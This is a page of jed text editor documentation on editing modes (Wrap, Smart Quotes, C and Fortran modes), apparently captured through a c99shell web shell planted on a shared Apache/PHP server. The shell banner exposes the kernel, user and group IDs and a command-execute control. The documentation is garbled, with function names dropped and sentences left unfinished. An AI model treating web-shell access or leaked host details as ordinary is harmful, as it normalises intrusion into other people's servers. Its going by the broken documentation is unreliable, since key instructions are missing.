Software: Apache. PHP/8.3.27 uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364) Safe-mode: OFF (not secure) /usr/share/doc/jed-common/html/ drwxr-xr-x | |
| Viewing file: Select action/file-type: 11 Modesjed supports two internal modes as well as user defined modes. The two internal modes consist of a “C” mode for C Language programming and a “Wrap” mode for ordinary text editing. Examples of user defined modes are Fortran mode and DCL mode. Online documentation is provided for nearly every mode jed defines.
For help on the current mode, press Esc X and enter
11.1 Wrap ModeIn this mode, text is wrapped at the column given by the 11.1.1 Formatting paragraphsParagraph delimiters are: blank lines, lines that begin with either a
percent character, %, or a backslash character The paragraph is formatted according to the indentation of the current line. If the current line is indented, the paragraph will be given the same indentation. The default binding for this function is Esc q. In addition, a paragraph may be “narrowed” by the
This paragraph is the result of using the
function ``narrow_paragraph''. Note how the
right margin is less here than in the above
paragraph.
Finally, if either of these functions is called from the keyboard with a prefix argument, the paragraph will be justified as well. For example, pressing Esc 1 Esc N on the previous paragraph yields: This paragraph is the result of using the
function ``narrow_paragraph''. Note how the
right margin is less here than in the above
paragraph.
See the discussion of 11.2 Smart QuotesYou have probably noticed that many key words in this document are quoted
in double quotes like “this is double quoted” and ‘this is single
quoted’. By default, the double quote key (") and single quote key (’) are
bound to the function This brings up the question: if the double quote key is bound to
11.3 C ModeC Mode facilitates the editing of C files. Much of the latter part of the
development of the jed editor was done using this mode. This mode may be
customized by a judicious choice of the variables By default, the Enter key is bound to the function
Finally, the key sequence Esc ; is bound to a function called
11.4 Fortran ModeFortran Mode is written entirely in S-Lang and is designed to facilitate the writing of Fortran programs. It features automatic indentation of Fortran code as well as automatic placement of Fortran statement Labels. In this mode, the keys 0-9 are bound to a function
This function is very similar to the one Emacs uses for labels. |
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.021 ]-- |